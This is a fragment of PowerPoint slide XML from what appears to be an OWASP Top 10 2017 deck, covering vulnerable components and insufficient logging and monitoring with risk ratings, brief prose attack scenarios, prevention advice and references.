                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="OpenSymbo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000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>While it is easy to find already-written exploits for many known vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit.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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Prevalence of this issue is very widespread. Component-heavy development patterns can lead to development teams not even understanding which components they use in their application or API, much less keeping them up to date. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>This issue is detectable by the use of scanners such as retire.js and header inspection, but verifying if it is exploitable requires an attack of some description.</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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>While some known vulnerabilities lead to only minor impacts, some of the largest breaches to date have relied on exploiting known vulnerabilities in components. Depending on the assets you are protecting, perhaps this risk should be at the top of your list.</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788797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Example Attack Scenarios</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An open source project forum software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Although source could be recovered, the lack of monitoring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An attacker uses scans for users using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>common password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. He can take over all accounts using this password. For all other users this scan leaves only 1 false login behind. After some days this may be repeated with a different password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: A major US retailer reportedly had an internal malware analysis sandbox analyzing attachments. The sandbox software had detected potentially unwanted software, but no one responded to this detection. The sandbox had been producing warnings for some time before the breach was detected due to fraudulent card transactions by an external bank.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Insufficient Logging &amp; Monitoring?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Insufficient logging, detection, monitoring and active response occurs any time:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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Auditable events, such as logins, failed logins, and high value transactions are not logged.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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Logs of applications and APIs are not monitored for suspicious activity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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Alerting thresholds and response escalation as per the risk of the data held by the application is not in place or effective.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For larger and high performing organizations, the lack of active response, such as real time alerting and response activities such as blocking automated attacks on web apps and particularly APIs would place the organization at risk from extended compromise. The response does not necessarily need to be visible to the attacker, only that the application and associated infrastructure, frameworks, service layers, etc. can detect and alert humans or tools to respond in near real time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - Implement Logging and Intrusion Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="90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900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard - V7 Logging and Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="90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900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Testing Guide - Testing for Detailed Error Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="90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900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet - Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>CWE-223: Omission of Security-relevant Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="90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900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>CWE-778: Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>As per the risk of the data stored or processed by the application:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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Ensure all login, access control failures, input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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Ensure high value transactions have an audit trail with integrity controls to prevent tampering or deletion, such as append only database tables or similar.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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Establish effective monitoring and alerting such that suspicious activities are detected and responded within acceptable time periods.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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Establish or adopt an incident response and recovery plan, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or later.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are commercial and open source application protection frameworks such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, web application firewalls such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>mod_security with the OWASP Core Rule Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, and log correlation software such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>ELK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> with custom dashboards and alerting. Penetration testing and scans by DAST tools (such as OWASP ZAP) should always trigger alerts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Insufficient</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Logging &amp; Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1285726005"/>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dirty="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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="OpenSymbo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lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
